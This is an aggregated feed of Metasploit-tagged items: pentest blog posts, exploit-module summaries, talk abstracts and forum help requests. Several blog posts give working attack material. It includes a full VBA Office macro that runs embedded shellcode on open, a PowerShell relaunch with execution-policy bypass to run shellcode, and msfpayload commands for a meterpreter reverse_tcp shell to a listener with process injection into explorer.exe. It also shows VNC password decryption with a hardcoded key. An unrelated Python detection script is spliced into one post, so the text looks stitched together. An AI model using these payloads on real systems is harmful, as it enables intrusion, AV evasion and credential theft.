208 items tagged "metasploit"
7:58 » Carnal0wnage
This is a quick blog post based on my slides from the May 2012 NovaHackers Meeting.
Two posts got me started looking at PowerShell and its ability to execute shellcode:
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html and
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!

The second post talks about doing something more than calc.exe...getting shell whooo hooooo
You can review the code but it only shows an x86/32-bit shellcode. This will fail miserably on x64.

I initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:
Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome I am during pentests
or
Invoke 32 bit PowerShell and run 32 bit shellcode (now we get http/https payloads)
So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution I used was here:
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
You will need to set the execution policy for v1.0 PowerShell, or possibly try a bypass technique.
I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if it's not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.
[Byte[]]$sc = $sc32
# On a 64-bit host $env:Processor_Architecture reports "AMD64"; only the WOW64 host reports "x86"
if ($env:Processor_Architecture -ne "x86")
{
write-warning "WTF! This is 64x, switching to 32x and continuing script."
# Re-run this same script file under the 32-bit PowerShell host so the 32-bit shellcode can execute
&"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass
# Do not fall through into the 64-bit run; the 32-bit child carries on from here
exit
}
now it works

Remember that you have to migrate out of the PowerShell process.
Much like the Office macro and shellcode exec, if the user closes Office, or you close/exit the PowerShell process, the shell goes bye-bye.
References:
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
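From the defender's side, the 64-bit to 32-bit PowerShell hop the post describes leaves a distinctive process-creation trail. The following is an added example, not code from the post or from Nicolas' script: it classifies constructed Sysmon-style process-creation events (Image, ParentImage and CommandLine fields are assumed) and flags a SysWOW64 powershell.exe spawned by the native powershell.exe with -executionpolicy bypass on its command line.

```python
"""Detect the 64-bit -> 32-bit PowerShell re-launch in process-creation telemetry.

Added example; field names are modelled on Sysmon Event ID 1 (process creation)
and the sample events at the bottom are constructed, not captured from a host.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


# Path suffixes of the two PowerShell hosts on a 64-bit Windows install.
WOW64_PS = r"\syswow64\windowspowershell\v1.0\powershell.exe"
NATIVE_PS = r"\system32\windowspowershell\v1.0\powershell.exe"

# powershell.exe accepts unambiguous prefixes of its switches, so match the
# common spellings of -ExecutionPolicy, -File and -NoProfile (case-insensitive).
BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
FILE_RE = re.compile(r"-(?:f|file)\s+\S+", re.I)
NOPROFILE_RE = re.compile(r"-(?:nop|noprofile)\b", re.I)


def classify(ev):
    """Return the list of indicators present in one event (empty = nothing notable)."""
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    reasons = []
    if image.endswith(WOW64_PS):
        if parent.endswith(NATIVE_PS):
            # The exact hop from the post: 64-bit PowerShell re-executing its own
            # script under the 32-bit host so 32-bit shellcode can run.
            reasons.append("wow64_powershell_spawned_by_native_powershell")
        else:
            # 32-bit PowerShell on its own is common for legacy installers.
            reasons.append("wow64_powershell")
    if BYPASS_RE.search(ev.command_line):
        reasons.append("execution_policy_bypass_on_command_line")
    if FILE_RE.search(ev.command_line) and NOPROFILE_RE.search(ev.command_line):
        reasons.append("noprofile_script_file")
    return reasons


def severity(reasons):
    """Map indicator combinations to a triage level."""
    if ("wow64_powershell_spawned_by_native_powershell" in reasons
            and "execution_policy_bypass_on_command_line" in reasons):
        return "high"
    if len(reasons) > 1:
        return "medium"
    if reasons:
        return "low"
    return "none"


def scan(events):
    """Return (pid, severity, reasons) for every event rated above 'none'."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        sev = severity(reasons)
        if sev != "none":
            hits.append((ev.pid, sev, reasons))
    return hits


# Constructed sample events: an ordinary interactive PowerShell, the hop from the
# post, and a legitimate 32-bit installer script that must not page anyone.
SAMPLE_EVENTS = [
    ProcessEvent(1204, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
    ProcessEvent(1388, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" '
                 r"-noprofile -file C:\Users\bob\run.ps1 -executionpolicy bypass"),
    ProcessEvent(2016, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\SysWOW64\msiexec.exe",
                 "powershell.exe -File setup.ps1"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The parent/child pairing is the strong signal; the execution-policy switch alone is noisy because many administrative scripts pass it legitimately.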
5:00 » Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, it's *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know, the app can't be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...it's ok if that DA admin script logs into it daily....
The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*
I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help; Nessus will actually tell you the methods allowed per directory...still a challenge though.
Once you have a directory you want to test you can use
cadaver to manually test,
davtest, or
Ryan Linn's metasploit module for testing for WebDAV.

I've also done some posts on WebDAV in the past:
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html
hdm had done a post on it in the past in relation to the asp payload, I can't find it on the R7 site but it's mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html
Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf
HTTP PUT
HTTP PUT/SEARCH usually gets rolled into

Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, I'm sure someone will correct me if I'm wrong.
Writable HTTP PUT is rare (at least for me) although some friends say they see it all the time.
Metasploit has a module to test for PUT functionality as well.
http://www.metasploit.com/modules/auxiliary/scanner/http/http_put
HTTP SEARCH
HTTP SEARCH can be fun. When enabled, it will give you a listing of every file in the webroot.
Mubix did a post on it
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
13:36 » Packet Storm Security Exploits
This Metasploit module exploits FreePBX versions 2.10.0, 2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code into the '$channel' variable in the function callme_startcall in order to gain remote code execution. Please note that in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voicemail). Tested on both Elastix and FreePBX ISO image installs.
22:45 » Packet Storm Security Misc. Files
Whitepaper called Metasploit: Low Level View. It touches on topics such as code injection and malware detection evasion / Metasploit encoders.
14:21 » Carnal0wnage
scriptjunkie recently had a post on Direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate macro code is in the post but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.
17:08 » Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument and passes it on to a ShellExecuteW() function, which therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
7:41 » Packet Storm Security Recent Files
This Metasploit module exploits a stack based buffer overflow in the ActiveX control file ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
7:50 » Packet Storm Security Exploits
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
22:26 » Packet Storm Security Exploits
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
7:36 » Packet Storm Security Recent Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
0:24 » SecDocs
Authors: Max Moser, Philipp Schrödel
Tags: web application, web, Metasploit
Event: Hashdays 2010
Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploit's Meterpreter technology to communicate between the client (the target to be scanned) and the server (the Metasploit server running the CARAT plugin), execute commands and consolidate the results. By introducing client-specific job scheduling to Metasploit, CARAT is a framework for automated configuration validation, security assessments and functional testing of components and applications. In contrast to a lot of other available frameworks, CARAT's architecture is as simple as possible, which allows a great amount of flexibility for its users.
18:07 » Packet Storm Security Exploits
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extract various data from the database and spawns shells through netcat and Metasploit.
13:14 » Packet Storm Security Exploits
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a Linux kernel and initrd into memory that reads the hard drive, placing the payload on the hard drive of any Windows partition seen and adding a uid 0 user with username and password metasploit to any Linux partition seen.
18:20 » Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
6:40 » Packet Storm Security Recent Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
8:27 » Packet Storm Security Recent Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
17:47 » Packet Storm Security Recent Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
4:12 » Carnal0wnage
You may find yourself needing to do process injection outside of metasploit/meterpreter. Good examples are when you have a Java meterpreter shell, or you have access to a GUI environment (Citrix), and/or AV is going all nom nom nom on your Metasploit binary.

There are two public options I have found; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload:
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt
Once you have a shell you need to migrate out of it; it will be in the shellcodeexec process, and as soon as someone Ctrl-Cs or kills that cmd.exe the process dies and so does your shell.
Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx
http://www.securestate.com/Documents/syringe.c
= Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile “C:\codelocation\cl syringe.c”
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 has the same issue as shellcodeexec: close cmd.exe or Ctrl-C and you lose the shell.
-2 is preferred: locate explorer.exe and inject the shellcode into that.
C:\Documents and Settings\User\Desktop>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 424 K
csrss.exe 604 Console 0 3,852 K
winlogon.exe 628 Console 0 5,012 K
services.exe 680 Console 0 3,440 K
lsass.exe 692 Console 0 1,408 K
vmacthlp.exe 848 Console 0 2,756 K
svchost.exe 864 Console 0 4,924 K
svchost.exe 944 Console 0 4,308 K
MsMpEng.exe 1040 Console 0 53,812 K
svchost.exe 1076 Console 0 23,780 K
svchost.exe 1164 Console 0 3,616 K
svchost.exe 1368 Console 0 3,916 K
explorer.exe 1624 Console 0 15,256 K
spoolsv.exe 1656 Console 0 6,072 K
VMwareTray.exe 1848 Console 0 5,044 K
VMwareUser.exe 1856 Console 0 6,328 K
msseces.exe 1864 Console 0 10,708 K
jusched.exe 1920 Console 0 4,304 K
msmsgs.exe 1928 Console 0 2,488 K
ctfmon.exe 1952 Console 0 3,248 K
svchost.exe 740 Console 0 3,760 K
jqs.exe 1108 Console 0 1,396 K
vmtoolsd.exe 1264 Console 0 9,976 K
VMUpgradeHelper.exe 1212 Console 0 4,176 K
TPAutoConnSvc.exe 2396 Console 0 4,392 K
alg.exe 2680 Console 0 3,612 K
TPAutoConnect.exe 3060 Console 0 4,848 K
iexplore.exe 3784 Console 0 16,300 K
iexplore.exe 4064 Console 0 45,392 K
wuauclt.exe 1224 Console 0 4,276 K
java.exe 1112 Console 0 27,516 K
java.exe 2520 Console 0 14,272 K
notepad.exe 440 Console 0 3,572 K
jucheck.exe 3112 Console 0 6,120 K
cmd.exe 3260 Console 0 2,700 K
tasklist.exe 3332 Console 0 4,580 K
wmiprvse.exe 3368 Console 0 5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 [msfencode's encoded payload] 1624
Looks like this (you can use the same shellcode in syringe):


-
-
0:52
»
Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
-
19:24
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
-
21:52
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results in code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application registers two file handlers, VWS and VWR, which allows a victim user to 'double click' the malicious VWR file and execute code.
-
-
13:36
»
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
19:32
»
Carnal0wnage
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
-
-
9:59
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
13:25
»
SecDocs
Authors:
Max Moser Philipp Schrödel Tags:
web application web Metasploit Event:
Hashdays 2010 Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploit's Meterpreter technology to communicate between the client (the target to be scanned) and the server (the Metasploit server running the CARAT plugin), execute commands and consolidate the results. By introducing client-specific job scheduling to Metasploit, CARAT is a framework for automated configuration validation, security assessments and functional testing of components and applications. Contrary to a lot of other available frameworks, CARAT's architecture is as simple as possible, which allows a great amount of flexibility to its users.
-
-
12:24
»
Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.

It's tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

-CG
-
-
-
17:44
»
Packet Storm Security Exploits
The TFTPUtil GUI server version 1.4.5 is vulnerable to a denial of service triggered by sending a specially crafted read request. Depending on the setup, sending the write request "\x00\x02" may also work. This is written as a Metasploit module.
-
-
18:10
»
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
-
9:29
»
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
-
22:17
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This Metasploit module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.
-
-
16:07
»
Packet Storm Security Recent Files
Whitepaper called Creating Windows Exploits with the Metasploit Framework, or Criar Exploits Para o Windows com a Ajuda da Metasploit Framework. Written in Portuguese.
-
-
19:41
»
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs; if I specify that I want XML output it won't produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metasploit 3.4.2-dev and nmap 5.35DC1.
-
-
16:47
»
Carnal0wnage
Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how you get this info once you're inside and using meterpreter as your pivot into the network.
Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see the server version, but you don't get a feel for what's actually on the site.
I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.
Looks like this when it runs...
msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
you can then check out the folder with the results

code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
-
-
16:01
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
-
-
10:41
»
remote-exploit & backtrack
Hello, I have recently started working with metasploit. I set up my Ubuntu Linux with metasploit and have a Windows XP Home SP2 in a VM. I created a file with msfpayload:
Code:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.178.50 V > /tmp/testfile.bas
I then try to integrate this file into the Word file, but as soon as I want to save with the imported code I always get the message that I have too little memory.
Does anyone have an idea what the cause could be? Thanks in advance for the help.
Thanks in advance
-
-
6:46
»
remote-exploit & backtrack
Hi,
I have BackTrack 4 running in a VM. I wanted to get into Metasploit a bit, but when updating an error always occurs:
Code:
root@bt:/pentest/exploits/exploitdb# msfupdate
Updating Metasploit from metasploit.com/svn/framework3/trunk...
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: cleaning up the SVN directory and retrying...
svn: In directory '.'
svn: Error processing command 'modify-wcprop' in '.'
svn: 'HACKING' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: please check connectivity to the following URL:
metasploit.com/svn/framework3/trunk
root@bt:/pentest/exploits/exploitdb#
Does anyone have an idea what this could be? The internet connection is working, though.
Thanks in advance
-
-
8:50
»
remote-exploit & backtrack
hi all,
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 569 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9903 updated today (2010.07.21)
On my BT 4 final the new Metasploit Java GUI [Exploits, Auxiliary, Payload (Menu)] is not working, please help me ..........
thanks for all
-
-
22:02
»
Packet Storm Security Exploits
USBsploit is a proof of concept for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can also be used with the original Metasploit Framework.
-
-
-
10:41
»
SecDocs
Authors:
Christian Papathanasiou Tags:
web server exploiting JBoss Event:
Black Hat EU 2010 Abstract: JBoss Application Server is the open source implementation of the Java EE suite of services. Its easy-to-use server architecture and high flexibility make JBoss the ideal choice for users just starting out with J2EE, as well as senior architects looking for a customizable middleware platform. The pervasiveness of JBoss in enterprise JSP deployments is second to none, meaning there is an abundance of targets for the blackhat and the pentester alike. JBoss is usually invoked as root/SYSTEM, meaning that any potential exploitation usually results in immediate super user privileges. A tool has been developed that is able to compromise an unprotected JBoss instance. The current state of the art in published literature involves having the JBoss instance connect back to the attacker to obtain a war file that is subsequently deployed. The tool that will be presented at Black Hat does this in-situ and ultimately uploads a Metasploit payload resulting in interactive command execution on the JBoss instance. On Windows platforms, through the Metasploit framework a fully interactive reverse VNC shell can also be obtained and shall be demonstrated. Depending on the platform that has been exploited and the level of access obtained, the tool is able to deploy the Metasploit payload as a persistent backdoor in conjunction with the Metasploit framework's antivirus evasion techniques. Due to the cross platform nature of the Java language, we are able to compromise JBoss instances running on Linux, MacOSX and Windows.
-
-
2:43
»
Packet Storm Security Recent Files
This Metasploit module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
-
-
22:48
»
remote-exploit & backtrack
Quote:
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-]
[*] Usage: db_create <user:pass>@<host:port>/<database>
[*] Examples:
[*] db_create user@metasploit3
[*] db_create user:pass@192.168.0.2/metasploit3
[*] db_create user:pass@192.168.0.2:1500/metasploit3
I got this error, please give me any idea to fix it, thanks
-
-
4:20
»
SecDocs
Authors:
H.D. Moore Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: In 2008 Metasploit expanded from a community-run project to a corporate product managed by Rapid7. This talk focuses on the transition, the lessons learned during the acquisition process, the challenges of maintaining a community, and the latest improvements to the Metasploit Framework. The points covered in this talk are valuable for anyone building an open-source product, contemplating the purchase of one, or considering using an open source product to build a commercial application.
-
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
